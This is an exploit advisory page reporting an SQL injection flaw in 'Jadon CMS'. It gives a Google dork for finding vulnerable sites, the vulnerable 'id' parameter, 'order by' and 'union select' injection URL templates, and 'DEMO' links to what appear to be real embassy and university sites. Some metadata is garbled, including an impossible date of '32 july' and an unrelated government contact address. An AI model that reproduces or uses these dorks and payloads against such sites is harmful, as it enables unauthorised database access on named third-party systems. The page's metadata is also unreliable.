Home / os / win10

INDIAN EMBASSY Jadon CMS SQL INJECTION Vulnerability

Posted on 30 November -0001

<HTML><HEAD><TITLE>INDIAN EMBASSY Jadon CMS SQL INJECTION Vulnerability</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>###########################

# INDIAN EMBASSY Jadon CMS SQL INJECTION Vulnerability

###########################

=========================================================
[+] Title                          :- INDIAN EMBASSY Jadon CMS - SQL INJECTION 
[+] Date                         :- 32 - july - 2016
[+] Vendor Homepage      :- http://jadontech.com/
[+] Version                      :- All Versions
[+] Tested on                   :- Linux - Windows - Mac
[+] Category                    :- webapps
[+] Google Dorks              :- "Designed by Jadon Technologies" or  inurl:/news_detail.php?in_id= site:.in
[+] Exploit Author             :- Natasya A.K.A codestack
[+] Team name                  :- codegirl , girls-silent , anongirls
[+] Official Website             :- www.codegirlmovie.com
[+] Available                      :- sql injection cheat sheet | sql injection Havij
[+] Greedz to                     :- Indonesian People | Keep-silent | Hmei7 
[+] Contact                        :-  admin@kpu.go.id

=========================================================
[+] Severity Level               :- High

[+] Request Method(s)       :- GET / POST

[+] Vulnerable Parameter(s) :- id, newsid=

[+] Affected Area(s)            :- Entire admin, database, Server

[+] About                           :- Unauthenticated SQL Injection via Multiple Php Files causing an SQL error

[+] SQL vulnerable File          :- /home/DOMAIN/public_html/XXX.php

[+] POC                               :- http://127.0.0.1/news_detail.php?id=[SQL]'

The sql Injection web vulnerability can be be exploited by remote attackers without any privilege of web-application user account or user interaction.


http://www.[WEBSITE].com/news_detail.php?id=63' order by [SQL INJECTION]--+
http://www.[WEBSITE].com/news_detail.php?id=63' union all select [SQL INJECTION]--+

[+] DEMO :-  http://www.jecrcudml.edu.in/news_detail.php?id=17'
                   http://www.embindia.org/news_detail.php?id=21
                   http://eoilisbon.in/news_detail.php?id=6

=======================================================

###########################

# Discovered Analyze by : Ternate-Labs Pentesting

###########################
              
</BODY></HTML>

 

TOP

Malware :

Exploits :